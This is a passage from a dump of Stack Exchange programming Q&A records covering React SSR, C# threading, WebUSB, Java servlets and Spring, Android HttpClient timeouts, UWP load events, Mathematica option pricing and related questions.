doing anything like this.but still it blinks .\nComment: @Oleg I am still confused. what did you define for `location` in client side?\nAnswer: i changed in server.js. its worked for me\nyours maybe (server\/index.js or server.js or server\/app.js..etc) \n<code>import Express from 'express';\nimport Loadable from 'react-loadable';\n\n\/\/ from \/\/\n\n app.listen(3000, () => {\n console.log('app now listening on port', port);\n });\n\n\/\/ to \/\/\n\n import Loadable from 'react-loadable';\n\n Loadable.preloadAll().then(() => {\n app.listen(port, () => {\n console.log('app now listening on port', port);\n });\n });\n<\/code>\nfor more config understanding you can see\nThe first step to rendering the correct content from the server is to make sure that all of your loadable components are already loaded when you go to render them.\nTo do this, you can use the Loadable.preloadAll method. It returns a promise that will resolve when all your loadable components are ready.\nComment: loadable component. doesnt have anything like that but i'm facing the blink . there is nothing to wrap `app.listen` in loadable components either.\n","meta":{"source":"stackoverflow","title":"React SSR blinks page","dup_signals":{}},"subset":"stackexchange"} +{"text":"AutoResetEvent Set called after timeout\n\nQuestion: From MSDN \"If there are no waiting threads, the wait handle remains signaled until a thread attempts to wait on it, or until its <code>Reset<\/code> method is called.\"\n<code>EventWaitHandle MyWaitHandle = new AutoResetEvent(false);\n<\/code>\nThread # 1:\n<code>public void Method1()\n{\n \/\/do something\n \/\/wait for the signal or timeout\n MyWaitHandle.WaitOne(10000);\n \/\/do something else on receiving signal or after timeout\n}\n<\/code>\nThread # 2:\n<code>\/\/this would be called when there is a response from the external app\npublic void Method2()\n{\n \/\/do something\n \/\/send the signal to waiting thread\n MyWaitHandle.Set();\n}\n<\/code>\nIn my application Thread # 1 is submitting a request to external app and waiting for a signal or timeout. 
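The behaviour behind the questions below is easy to reproduce in isolation: a Set that arrives after a timed-out wait leaves the event signalled, so the next wait returns immediately. A minimal sketch (variable names are illustrative only):
<code>var gate = new AutoResetEvent(false);

bool first = gate.WaitOne(100);   // nothing signalled yet: times out, returns false
gate.Set();                       // the "late" signal: the event stays signalled
bool second = gate.WaitOne(0);    // returns true at once and resets the event
<\/code>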
If a response is received from the external app Thread # 2 sets the wait handle. This <code>set<\/code> can be called even after the timeout. My questions are \n1) It is highly possible that <code>Method2<\/code> can be called after the timeout resulting in setting the signal. Does that mean whenever there is a request to Thread # 1 in the future, the <code>WaitOne(10000)<\/code> has no effect and will be released immediately?\n2) Is there anyway for me to not call <code>set<\/code> in <code>Method2<\/code> in case of timeout? Would that cause any problems to the Thread # 1?\nComment: Why would you not want to set the event even after a timeout? Does Method2 not signal that something is ready for Method1? Perhaps if you explain what you're trying to accomplish...\nComment: `Method2()` would not know if it is being called after timeout. There lies the issue. Well, I can monitor the time and set a `bool` variable to find out if it is timedout. But Can I call the `Set()` based on a `bool` value. If I don't call would it leave any open handles or anything?\nAnswer: Why not just make sure the wait handle is always reset before waiting on it?\n<code>public void Method1()\n{\n \/\/ Reset the wait handle I'll be using...\n MyWaitHandle.Reset();\n\n \/\/do something\n \/\/wait for the signal or timeout\n MyWaitHandle.WaitOne(10000);\n \/\/do something else on receiving signal or after timeout\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"AutoResetEvent Set called after timeout","dup_signals":{}},"subset":"stackexchange"} +{"text":"Accessing WebUSB of Chrome through AngularJS\n\nQuestion: I am having an issue while using WebUSB APIs for chrome through angularJS. This is a project where I need to access an esc\/pos thermal printer for printing invoice.\nIn normal javascript:\nHTML:\n<code><button id=\"connect\">Connect<\/button>\n<\/code>\nJavascript:\n<code>document.addEventListener('DOMContentLoaded', async () => {\n try{\n let devices = await navigator.usb.getDevices({\n filters: [{\n vendorId: VENDOR_ID,\n productId: PRODUCT_ID\n }]\n });\n let button = document.getElementById('connect');\n\n button.addEventListener('click', async () => {\n if (devices.length === 0) {\n\n var device;\n let devices = [];\n\n try {\n device = await navigator.usb.requestDevice({\n filters: [{\n vendorId: VENDOR_ID,\n productId: PRODUCT_ID\n }]\n });\n }\n catch (error) {\n console.log(error)\n }\n }\n else {\n device = devices[0];\n }\n console.log('open');\n await device.open();\n console.log('opened:', device);\n await device.selectConfiguration(1); \/\/ Select configuration #1 for the device.\n await device.claimInterface(0); \/\/ Request exclusive control over interface #0.\n console.log(await device.transferOut(2,buffer));\n })\n\n }\n catch (error) {\n console.log(error)\n }\n<\/code>\nin angularjs:\nHTML:\n<code><button class=\"btn btn-warning\" ng-init=\"newinvscopetest.bindPrint()\" id=\"print\">Print<\/button>\n<\/code>\ncontroller:\n<code>newinvscopetest.bindPrint = function (){\n let button = document.getElementById('print');\n\n button.addEventListener('click', async () => {\n let device;\n let devices = [];\n const VENDOR_ID = 0x0FE6;\n const PRODUCT_ID = 0x811E;\n try {\n devices = await navigator.usb.getDevices({\n filters: [{\n vendorId: VENDOR_ID,\n productId: PRODUCT_ID\n }]\n });\n if (devices.length === 0) {\n try {\n device = await navigator.usb.requestDevice({\n filters: [{\n vendorId: VENDOR_ID,\n productId: PRODUCT_ID\n }]\n });\n }\n catch (error) {\n console.log(error)\n }\n 
}\n else {\n device = devices[0];\n }\n console.log('open');\n await device.open();\n console.log('opened:', device);\n await device.selectConfiguration(1); \/\/ Select configuration #1 for the device.\n await device.claimInterface(0); \/\/ Request exclusive control over interface #0.\n let buffer = newinvscopetest.getPrintData();\n console.log(await device.transferOut(2,buffer));\n }\n catch (error) {\n console.log(error)\n }\n });\n };\n<\/code>\nWhile trying with the angular script a DOMException is throwing an error : \n\nMust be handling a user gesture to show a permission request.\n\nThis is required by web usb's requestDevice function, which is supposed to be a user button click or mouse hover.\nAnd this is working fine in the first example because the user is clicking the button to trigger the function.\nIn the 2nd example, the same thing is happening. I even avoided ng-click to have native event listener to try if that work. But no luck with that too. \nCan anyone help me? What is going wrong in angularJS?\nAnswer: I'm not sure about the first example but in the second example, before calling <code>requestDevice()<\/code> you await the promise returned by <code>getDevices()<\/code>. This means that the rest of your async function is called after this promise is resolved and your code no longer has a user gesture.\nInstead of calling <code>getDevices()<\/code> on every click I recommend calling it only once on page load and using an event listener (added with <code>navigator.usb.addEventListener('connect', ...)<\/code>) to detect a device connected after the page load.\nComment: Thanks for the confirmation. I was thinking the same thing. I will test this soon. But tell me one thing. If I use ng-click instead of addEventListener for the button press, will it still be user gesture?\nComment: It should be the same. If it isn't that sounds like a bug in Angular.\n","meta":{"source":"stackoverflow","title":"Accessing WebUSB of Chrome through AngularJS","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to add numbers in link (loop)\n\nQuestion: I'm writing a script where I try to scrape data from json files. The website link structure looks like this:\n\nhttps:\/\/go.lime-go.com\/395012\/Organization\/pase1009\/\n\nI want the Python script to go through a certain number and try to visit them. For example, right now the link is at pase1009. After the script has visited this link I want it to go to pase1010 and so on.\nI'm really new to Python and trying to learn how to use loops, count, etc. 
but don't get it.\nMy PY code:\n<code> rlista = \"https:\/\/go.lime-go.com\/395012\/Organization\/pase1009\/getEmployees\"\n page = self.driver.get(rlista)\n time.sleep(2)\n<\/code>\nBest regards,\nTobias\nComment: Thats quite basic stuff, you should consider reading some tutorials (google for python loop)\nAnswer: You can combine several strings to one with the <code>+<\/code>-operator.\nSo you could save your base link in a variable and add the number afterwards in the loop.\nWould look something like this:\n<code>baseLink = \"https:\/\/your-link.com\/any\/further\/stuff\/pase\"\n\nfor k in range(1000,1010,2):\n link = baseLink + str(k)\n print(link)\n<\/code>\nThere your links would be\n\nhttps:\/\/your-link.com\/any\/further\/stuff\/pase1000\nhttps:\/\/your-link.com\/any\/further\/stuff\/pase1002\nhttps:\/\/your-link.com\/any\/further\/stuff\/pase1004\nhttps:\/\/your-link.com\/any\/further\/stuff\/pase1006\nhttps:\/\/your-link.com\/any\/further\/stuff\/pase1008\n\nas k will start with 1000, increment by 2 and stop before 1010 (<code>range(start, stop, increment)<\/code>).\n","meta":{"source":"stackoverflow","title":"How to add numbers in link (loop)","dup_signals":{}},"subset":"stackexchange"} +{"text":"WCF Streamed\/chunked upload?\n\nQuestion: I would like to add uploading files to my WCF REST web service, but I don't want an entire file to be uploaded - only 16kb portions of the file at every 256kb need to be uploaded.\nSo the user of the REST service doesn't have to faff around doing this, is it possible for a WCF service to only recieve certain portions WITHOUT uploading the entire file first, then picking out the bits needed?\nAnswer: WCF does not do much when it comes to uploading a file. It receives a stream, which it then processes. It would be the client that would have to determine which parts of the file to send out on the stream. Some of the newer web API's being designed alongside HTML 5 might be able to provide some support for this... In the mean time, I know there are several Flash based file uploaders that are able to provide much richer, streaming file uploading. 
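Whatever client technology ends up doing the upload, the piece it has to own is the offset arithmetic for pulling a 16kb sample at every 256kb boundary. As a rough sketch of just that read pattern (written in Python here purely to illustrate the idea - the name <code>iter_samples<\/code> and the framing are invented for this example, and the real client would be whatever actually talks to the WCF endpoint):\n<code>CHUNK_STRIDE = 256 * 1024   # a sample starts at every 256kb boundary\nSAMPLE_SIZE = 16 * 1024     # read 16kb from the start of each stride\n\ndef iter_samples(path):\n    # yield (offset, data) pairs for the slices the client should send\n    with open(path, \"rb\") as f:\n        offset = 0\n        while True:\n            f.seek(offset)\n            data = f.read(SAMPLE_SIZE)\n            if not data:\n                break\n            yield offset, data\n            offset += CHUNK_STRIDE\n<\/code>\nEach (offset, data) pair would then be written to the request stream the service exposes, with the offset included so the server knows which part of the file it is looking at.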
It might be possible to use Silverlight in a similar way to cherry-pick chunks of your client files, and send those chunks to the listening WCF service.\nRegardless of what client-side technology you use, the choice of which file parts to send to the WCF service would have to be done at the client.\n","meta":{"source":"stackoverflow","title":"WCF Streamed\/chunked upload?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Result redirection not working with jsp\n\nQuestion: I'm getting a ping result in my servlet.I'm trying to redirect it to another jsp file.\nthe jsp file for output opens.But nothing shows in it.\nThis is my servlet main code \n<code>protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n \/\/ TODO Auto-generated method stub\n String ip = request.getParameter(\"ip\"); \n response.setContentType(\"text\/html\");\n PrintWriter out = response.getWriter();\n \/\/ out.println(\"The ip address is:\"+ip+\"\\n\");\n String result = pingTest(ip);\n out.println(result);\n String redirect = \"Output.jsp\";\n RequestDispatcher view = request.getRequestDispatcher(redirect);\/\/Is it good approach to redirect request in ajax based servlet?\n view.forward(request, response);\n } \n<\/code>\nThis is my output.jsp page\n<code><%@ page language=\"java\" contentType=\"text\/html; charset=UTF-8\"\n pageEncoding=\"UTF-8\"%>\n<!DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\n<html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=UTF-8\">\n<title>Ping Check Result<\/title>\n<\/head>\n<body>\n<\/body>\n<\/html\n<\/code>\nDo I need to add anything in output.jsp?\nComment: Well, there is nothing in the body of your JSP. So why should it display anything? Also, what you're doing is forwarding, (which is fine), but not redirecting, which is a completely different thing.\nAnswer: In your servlet:\n<code>request.setAttribute(\"result\", result);\nrequest.getRequestDispatcher(\"\/WEB-INF\/Output.jsp\").forward(request, response);\n<\/code>\nIn your JSP:\n<code><pre>The data from servlet: ${result}<\/pre>\n<\/code>\nAnswer: your servlet must be :\n<code> protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n\n String ip = request.getParameter(\"ip\"); \n response.setContentType(\"text\/html\");\n PrintWriter out = response.getWriter();\n out.println(\"The ip address is:\"+ip+\"\\n\");\n String result = pingTest(ip);\n out.println(result); \n RequestDispatcher view = request.getRequestDispatcher();\n view.forward(request, response);\n }\n<\/code>\n","meta":{"source":"stackoverflow","title":"Result redirection not working with jsp","dup_signals":{}},"subset":"stackexchange"} +{"text":"Spring Inject boolean value from property file using XML is always false\n\nQuestion: I am trying to inject boolean property from property file. 
the value of the attribute is alway <code>false<\/code>\nthe property \n<code>use.virtual.wallet=true\n<\/code>\nThe xml configuration\n<code><bean id=\"proxyUtil\" class=\"com.util.ProxyServiceUtility\">\n <property name=\"useVirtualWallet\" value=\"${use.virtual.wallet}\" \/>\n<\/bean>\n<\/code>\nthe bean\n<code>public class ProxyServiceUtility {\n\n private boolean useVirtualWallet;\n\n public void setUseVirtualWallet(boolean useVirtualWallet) {\n this.useVirtualWallet = useVirtualWallet;\n }\n\n public boolean isUseVirtualWallet() {\n return useVirtualWallet;\n }\n}\n<\/code>\n<code>useVirtualWallet<\/code> is alway false\nAnswer: You have to load your properties file into Spring context using PropertyPlaceholderConfigurer.\n<code><bean class=\"org.springframework.beans.factory.config.PropertyPlaceholderConfigurer\">\n <property name=\"locations\" value=\"classpath:com\/foo\/jdbc.properties\"\/>\n<\/bean>\n<\/code>\nComment: I already do that, and i have a lot of other properties loaded correctly, the only problem is regarding the boolean one\nAnswer: The problem fixed using this workaround, instead of injecting <code>boolean<\/code>, I injected <code>String<\/code> and then converted that <code>String<\/code> to <code>boolean<\/code> on the setter \n<code>public void setUseVirtualWallet(String useVirtualWallet) {\n this.useVirtualWallet = Boolean.parseBoolean(useVirtualWallet);\n}\n<\/code>\nAnswer: Another variant\n<code><beans \n xmlns:context=\"http:\/\/www.springframework.org\/schema\/context\">\n\n <context:property-placeholder location=\"classpath:com\/foo\/jdbc.properties\"\/>\n ...\n\n<beans>\n \n<\/code>\n","meta":{"source":"stackoverflow","title":"Spring Inject boolean value from property file using XML is always false","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why can's a thread make a blocking system call (user level threads)?\n\nQuestion: I am reading Modern Operating System (4th edition). I am not really sure about this paragraph.\n\nDespite their better performance, user-level threads packages have some major\n problems. First among these is the problem of how blocking system calls are implemented.\n Suppose that a thread reads from the keyboard before any keys have\n been hit. Letting the thread actually make the system call is unacceptable, since\n this will stop all the threads.\n\nIf a thread blocks waiting for an input, can't another thread be off doing something else? Why it would \"stop all the threads\"?\nAnswer: User level threads are implemented in user code; they are not scheduled individually by the kernel. All user level threads run in the context of a single kernel-scheduled task and therefore one can not preempt another. So when a user thread makes a system call, it blocks, and there is no way for another user thread (in the same kernel-scheduled task) to execute. \nNote that this is not how most threads work on modern OSes. pthreads on Linux and threads created by CreateThread on NT kernels are scheduled individually by the kernel. \nAnswer: The issue that statement addresses is that user threads are implemented as a library. There is a main thread that manages other threads. The main thread uses timers to switch among the various threads. On most [all?] 
Unix implementations a blocking I\/O call blocks the timers from being delivered to the main thread and all threads come to a halt.\nIn kernel threads, the operating system (not the process) schedules threads for execution so this is not an issue because the kernel is not blocked.\nKeep in mind that the quoted statement is not true for user threads on all operating systems. Many non-unix systems will deliver timer notification to a process even when there is a blocking I\/O request pending.\nComment: From the Tanenbaum OS book it is mentioned the following: \"in user level threads, if a thread starts running, no other thread in that process will ever run unless the first thread voluntarily gives up the CPU\". This contradicts with your statement \"The main thread uses timers to switch among the various threads.\" Could you explain it?\nComment: That is only true with SOME operating systems (notably eunuchs). Systems with software interrupts have no problem.\n","meta":{"source":"stackoverflow","title":"Why can's a thread make a blocking system call (user level threads)?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Apache HttpClient 4.0 failing to timeout for socket on Android\n\nQuestion: I'm working on an Android application that requires the use of HttpClient in order to upload a file from the Android device to a web server. The file I'm uploading can reach sizes up to 1 Gb, and so timeouts can occur if the device loses connection during the upload. The weird thing is that the timeout I set for the socket doesn't seem to have any effect. The application would just hang whenever I lose connection instead of raising the SocketTimeoutException. \nI tried using:\n<code>HttpConnectionParams.setConnectionTimeout(params, CrashLogParams.TIMEOUT);\nHttpConnectionParams.setSoTimeout(params, CrashLogParams.TIMEOUT);\n<\/code>\nbut this only worked for the connection timeout, not the socket timeout. Also I tried:\n<code>HttpParams p = httpclient.getParams();\np.setIntParameter(CoreConnectionPNames.SO_TIMEOUT, 10000);\np.setIntParameter(CoreConnectionPNames.CONNECTION_TIMEOUT, 10000);\n<\/code>\nThe reason I know that connection timeout works is because, I would get the exception for connection timeout after executing\n<code>httpclient.execute(httppost);\n<\/code>\nThe application seems to hang when connection is lost during upload, but after the application has successfully made a connection to the server.\nTo test my app, I disabled the network at different times to see how the application would react. If I disable the network before sending the request, I get a connection error and my application can gracefully handle that, but if I disable it during upload the application hangs. Of course I'm doing all these requests through AsyncTasks, so the main UI Thread doesn't crash. I'm just wondering if there is any other way to make sure that the socket will timeout upon not receiving any data, or if I'm missing anything here. I've read many blogs and posts, but most of them just suggest using SO_TIMEOUT which doesn't work for me.\nsotimeout not working in a multipart http post on android 2.1\nComment: Has your app worked with smaller size file?\nComment: I've tried 1 mb files and the bug is still there. I guess with smaller files you will have a more likelihood of disconnecting in times between the file uploads, but that is besides the point. 
I want to be able to make my application robust in the event of network failures.\nComment: I am having this same exact problem, except my upload sizes are fairly small, on the order of a few kb. All that seems to be required to trigger the bug is for the network to go down after I check if it is up but before I call execute().\nAnswer: Are you creating your own ClientConnectionManager? Take a look at the source for AndroidHttpClient.newInstance(). \nThey create a new BasicHttpParams object and pass it to the constructors for both a ThreadSafeClientConnectionManager and the DefaultHttpClient. I don't see a way to set parameters on the ClientConnectionManager except in the constructor.\nComment: Yes I am extending DefaultHttpClient to create my own HttpClient that enables SSL. The extended class overrides the createClientConnectionManager(), and sets the HttpParams as you stated. The code I listed was able to set the connection timeout correctly because when I increased the timeout time, the time I had to wait until an exception was raised also increased correspondingly. The only problem is the socket timeout never gets raised no matter what values I try.\nAnswer: I'm facing the same problem as you, with the same use case. It happens on a samsung galaxy s2 running android 2.3.6 but not with the same device on 4.x . Unfortunately this is exactly the device my customer uses, and it runs fine on roughly 10 other test devices with various Android versions and constructors...\nI spent hours trying with <code>HttpUrlConnection<\/code> library instead of HttpClient from Apache, but the end result is the same. <code>AndroidHttpClient<\/code> shows the same behavior. This leads me to say that it sounds like an hardware implementation or OS related problem...\nThe only workaround I found was to put the <code>HttpClient.execute()<\/code> method in a separate thread and call <code>thread.join(timeout)<\/code> as a security to stop the thread if anything goes wrong. The drawback is when upload runs fine but takes longer than the timeout, the request is interrupted...\nIf you found something in the meantime, I would greatly appreciate if you could share it.\n","meta":{"source":"stackoverflow","title":"Apache HttpClient 4.0 failing to timeout for socket on Android","dup_signals":{}},"subset":"stackexchange"} +{"text":"style tag content can be truncated in Microsoft Edge\n\nQuestion: Given the following HTML document displayed in Microsoft Edge (110.0.1587.57), and the content of a style tag exceeds 10,000 characters, Edge will act as though classes in the style tag found after the 10k character mark do not exist.\n<code><html>\n <head>\n <style>.test{background-color:orange}p{color:green}<\/style>\n <\/head>\n <body>\n <p>This text should be green!<\/p>\n <\/body>\n<\/html>\n<\/code>\nIf you change the code above and duplicate the \".test{background-color:orange}\" approximately 350 times, you will have a style tag long enough to recreate the problem. The p style should remain at the end or at least beyond the 10,000 character mark.\nWhen you open the developer tools by clicking on the paragraph tag and inspecting the html, the css section does not show the style for the p tag. And consequently, the text is black.\nOn the test html, there are some times when the text comes up green. This is not the case in the actual problem environment so I have not perfectly recreated the problem. However, the test html does demonstrate the problem if I let it set for a while. 
The text will turn black again and the css section will no longer show the p style being applied.\nWhen I run the same test in Firefox, the p style displays correctly.\nAnswer: I have tried testing the issue with the Microsoft Edge (110.0.1587.57) and Google Chrome.\nIn both browsers, text shown in the green color.\n\nWhen we check the CSS code under Style tag using the Dev tools, it shows ellipsis because the length of the CSS is long.\n\nBut it does not mean that CSS that not displayed here, not got executed.\nWhen you click the element on the page, you could see the CSS applied to it.\n\nBeside the CSS, there is a link to source code. If you click it, you will see the whole code.\n\nI have tried several times, I did not see the black text or the CSS is not applied to text even after pasting the <code>.test{background-color:orange}<\/code> more then 350 times.\nIf you still seeing the issue, I would suggest try to update the Edge to 111.x version and see the results.\n","meta":{"source":"stackoverflow","title":"style tag content can be truncated in Microsoft Edge","dup_signals":{}},"subset":"stackexchange"} +{"text":"About Internal mechanics in FinancialDerivative\n\nQuestion: I want to find the price of a call option,using mathematica.\nHowever, I found a question when using Financial Derivative.\nThe following two codes are to get the price of the call.\n<code>SeedRandom[1234];\nsmpl1=FinancialDerivative[{\"European\", \"Call\"}, {\"StrikePrice\" -> 50.00, \n \"Expiration\" -> 1}, {\"InterestRate\" -> 0.1, \"Volatility\" -> 0.5, \n \"CurrentPrice\" -> #}] & \/@ Range[1, 100];\nListLinePlot[smpl1]\n<\/code>\n\n<code>smpl2 = Table[\n SeedRandom[1234];\n Max[Last[#[[;; , 2]]] - 50, 0] & \/@ \n Normal[RandomFunction[\n GeometricBrownianMotionProcess[0.1, 0.5, start], {0, 1, 0.1}, \n 100000]] \/\/ Mean,\n {start, 1, 100}];\nListLinePlot[smpl2]\n<\/code>\n\nAs far as I know,FinancialDerivative must use <code>GeometricBrownianMotionProcess<\/code>,but the result is completely different.\nWhat's happening in mathematica or just a bug of my code?\nOk,I had to make the value risk-neutral.\n<code>smpl3 = Table[SeedRandom[1234];\n Exp[-0.1]*Max[Last[#[[;; , 2]]] - 50, 0] & \/@ \n Normal[RandomFunction[\n GeometricBrownianMotionProcess[0.1, 0.5, start], {0, 1, 0.1}, \n 100000]] \/\/ Mean, {start, 1, 100}];\nListLinePlot[{smpl1, smpl3}]\n<\/code>\nComment: trying fixing my code again and again, and I noticed I have to multiply `Exp[-0.1]` to make the value risk-free...self-solved....\nComment: Please check if `Max[{1, 2, 3}-2, 0]` returns what you expect.\nComment: yes,that returns what I expected\nComment: Commenting with a very limiting knowledge about financial derivatives and financial computing: I would say that ``FinancialDerivative`` doesn't do stochastic simulation, but instead simply takes the _analytical solution_ for the mean of the corresponding stochastic process. 
For example: ``Mean[GeometricBrownianMotionProcess[\\[Mu], \\[Sigma], x0][t]] \/\/ Simplify`` returns ``E^(t \\[Mu]) x0``.\nAnswer: As I have already mentioned in the comment, Mathematica almost surely uses the exact solutions of the Black-Sholes model.\n<code>FinancialDerivative[{\"European\", \"Call\"}, {\"StrikePrice\" -> 50.00, \n \"Expiration\" -> 1}, {\"InterestRate\" -> 0.1, \"Volatility\" -> 0.5, \n \"CurrentPrice\" -> 100}]\n(* 55.5471 *)\n\nn[x_] := CDF[NormalDistribution[], x]\ncall[k_, r_, \\[Sigma]_, t_, S0_] := Module[{d1, d2},\n d1 = 1\/(\\[Sigma] Sqrt[t]) (Log[S0\/k] + (r + \\[Sigma]^2\/2) t);\n d2 = d1 - \\[Sigma] Sqrt[t];\n n[d1] S0 - n[d2] k Exp[-r t]\n]\n\ncall[50, .1, .5, 1, 100]\n(* 55.5471 *)\n\nPlot[call[50, .1, .5, 1, S0], {S0, 0, 100}]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"About Internal mechanics in FinancialDerivative","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to parser JavaScript multidimensional array to c# array?\n\nQuestion: Example of JavaScript arrays:\n<code>var array_1 = [[\"string 1\", 2013, \"string 2\"], \"string 3\", [\"string 4\", , \"string 5\"]];\n\/* array_1[0][2] = \"string 2\" *\/\n\nvar array_2 = [1, , [\"string 1\", \"string 2\"]];\n\/* array_2[0][0] = 1 *\/\n<\/code>\nI need to parse JS arrays like it to c# <code>jagged array<\/code> or <code>any other object<\/code> that can access each child string by index easy, by function, with:\n\nnumber become string (<code>1<\/code> => <code>\"1\"<\/code>)\n<code>null<\/code> become <code>\"\"<\/code> (string with length = 0).\n\nCan you help me how to do this? Thank you very much!\nAnswer: using Json.NET\n<code>\/\/ using\nusing Newtonsoft.Json.Linq;\n\nstring JSarray_1 = @\"[[\"\"string 1\"\", 2013, \"\"string 2\"\"], \"\"string 3\"\", [\"\"string 4\"\", , \"\"string 5\"\"]]\";\nJObject j = JObject.Parse(\"{\\\"j\\\":\" + JSarray_1 + \"}\");\nMessageBox.Show((string)j[\"j\"][0][2]); \/\/ \"string 2\"\n<\/code>\nAnswer: See the C# language documentation: \"Multidimensional Arrays (C#)\"\n<code>string[,] items = new string[,] {{\"string 1\",\"string 2\"},...};\n<\/code>\nComment: Technically, what the OP seems to have there is a jagged array, not a multi-dimensional one.\nAnswer: I think what TuyenTk is looking for, and emigue is trying to describe is to use a library which does the \"magic\"(=parsing)\nI'd recommend JSON.Net since it's the one I use all the time - but I guess there are plenty of these out there.\nThe linked page also includes some simple examples on how to use it.\nAbout replacing null with emptystring:\n<code>var myValue = origValue ?? 
String.Empty;\n<\/code>\nif origValue is null myValue will be set to \"\", otherwise the expression will evaluate to origValue;\nFor further information on \"??\", or the \"null-coalescing operator\" as it's called, see the doc\nAnswer: As Jagged Arrays \n<code>string[][] items = new string[3][];\n\nitems [0] = new string[2];\nitems [1] = new string[1];\nitems [2] = new string[2];\n\nitems[0][0] = \"string1\";\nitems[0][1] = \"string3\";\nitems[1][0] = \"string4\";\nitems[2][0] = \"string5\";\nitems[2][1] = \"string6\";\n<\/code>\nOR\n<code>string[][] items = new string[][] \n{\n new string[] {\"string1\", \"string3\"},\n new string[] {\"string4\"},\n new string[] {\"string5\", \"string6\"}\n};\n<\/code>\nAnswer: If you need parse javascript arrays to c# arrays, You can serialize Javascript arrays to JSON and then deserialize JSON to C# array.\nPreviously, you need to do one transformation: replace \"\" by null in Javascript array representation as string.\nThen, you can make something like this:\n<code>var JSArrayString = @\"{\"array_1\": [[\"string 1\", 2013, \"string 2\"], \"string 3\", [\"string 4\", null, \"string 5\"]]}\";\nvar CSharpDict = SomeJSONLibrary.Deserialize(JSString);\nvar CSharpArray = CSharpDict[\"array_1\"];\nvar myItem = CSharpArray[0][2];\n<\/code>\nComment: Sorry, can you explain more clearly? From `JSArrayString` to `CSharpArray[0][2]` is a long distance.\n","meta":{"source":"stackoverflow","title":"How to parser JavaScript multidimensional array to c# array?","dup_signals":{}},"subset":"stackexchange"} +{"text":"UWP Event when all page components have loaded?\n\nQuestion: This seems very simple, but I have googled & googled without success. I'm trying to find the definitive list of page load event ordering. My observations so far are very confusing as the main page's Loaded event completes ahead of some of the user control Loaded events. I think in WPF there's a LoadCompleted event, but I can't find the equivalent. \nthanks!\nAnswer: Controls load from the inside out.\nPlease consider the following example:\nMy Xaml Page\n<code> <Page\n ... 
Loaded=\"Page_Loaded\">\n \n <Grid Loaded=\"Grid_Loaded\">\n <StackPanel Loaded=\"StackPanel_Loaded\" Orientation=\"Vertical\">\n <TextBlock Loaded=\"TextBlock_Loaded\" Text=\"My Text\"\/>\n <Button Loaded=\"Button_Loaded\" Content=\"Button\"\/>\n <\/StackPanel>\n <\/Grid>\n <\/Page>\n<\/code>\nMy behind code\n<code>namespace App1\n{\n public sealed partial class MainPage : Page\n {\n public MainPage()\n {\n this.InitializeComponent();\n this.Loaded += MainPage_Loaded;\n }\n\n private void MainPage_Loaded(object sender, RoutedEventArgs e)\n {\n this.Frame.Loaded += Frame_Loaded;\n }\n\n private void Frame_Loaded(object sender, RoutedEventArgs e)\n {\n Debug.WriteLine(\"Frame Loaded\");\n }\n\n private void Page_Loaded(object sender, RoutedEventArgs e)\n {\n Debug.WriteLine(\"Page Loaded\");\n }\n\n private void Grid_Loaded(object sender, RoutedEventArgs e)\n {\n Debug.WriteLine(\"Grid Loaded\");\n }\n\n private void StackPanel_Loaded(object sender, RoutedEventArgs e)\n {\n Debug.WriteLine(\"Stack Panel Loaded\");\n }\n\n private void TextBlock_Loaded(object sender, RoutedEventArgs e)\n {\n Debug.WriteLine(\"Text Block Loaded\");\n }\n\n private void Button_Loaded(object sender, RoutedEventArgs e)\n {\n Debug.WriteLine(\"Button Loaded\");\n }\n }\n}\n<\/code>\nWith this setup your output should be Button Loaded, Stack Panel Loaded, Grid Loaded, Page Loaded, Frame Loaded.\nand in fact, when I compile and run this I see\n\nText Block Loaded\nButton Loaded\nStack Panel Loaded\nGrid Loaded Page Loaded\nFrame Loaded\n\nin my output window.\nThis is because the controls are loading from the inside out. Now you start to run into problems when you're using asynchronous controls. You actually might have two loading events you care about. One says that the UI element is loaded and one says that the content of that UI element is loaded.\nLet's use the WebView as an example.\nIt has multiple completed events.\n\nLoadCompleted Occurs when top-level navigation completes and the\ncontent loads into the WebView control or when an error occurs during\nloading.\nFrameDOMContentLoaded Occurs when a frame in the WebView has finished\nparsing its current HTML content.\nFrameNavigationCompleted Occurs when a frame in the WebView has\nfinished loading its content.\n\nIt also has the normal Loaded event as well\n\nLoaded Occurs when a FrameworkElement has been constructed and added\nto the object tree, and is ready for interaction. (Inherited from\nFrameworkElement)\n\nSo the moral of the story is that unless you post your actual code, there's no physical way to tell what is actually going wrong. Every control can have multiple loaded events. Your delay might be caused by anything.\nComment: Actually, the statement \"the components loads from inside out\" it is not true, a counterexample would be nested UserControls.\n","meta":{"source":"stackoverflow","title":"UWP Event when all page components have loaded?","dup_signals":{}},"subset":"stackexchange"} +{"text":"configure codeship to run when non-contributors make pull requests\n\nQuestion: Default behavior for Codeship appears to be to only run CI against pull requests from existing contributors, not from people outside the organization. How do you change this behavior?\nAnswer: Unfortunately, Codeship doesn't support running tests against pull requests from people outside the organization.\nFrom the Codeship FAQ (emphasis added):\n\nTesting PRs from Forked Repositories\nCodeship does not support testing pull requests from forked\nrepositories at the moment. 
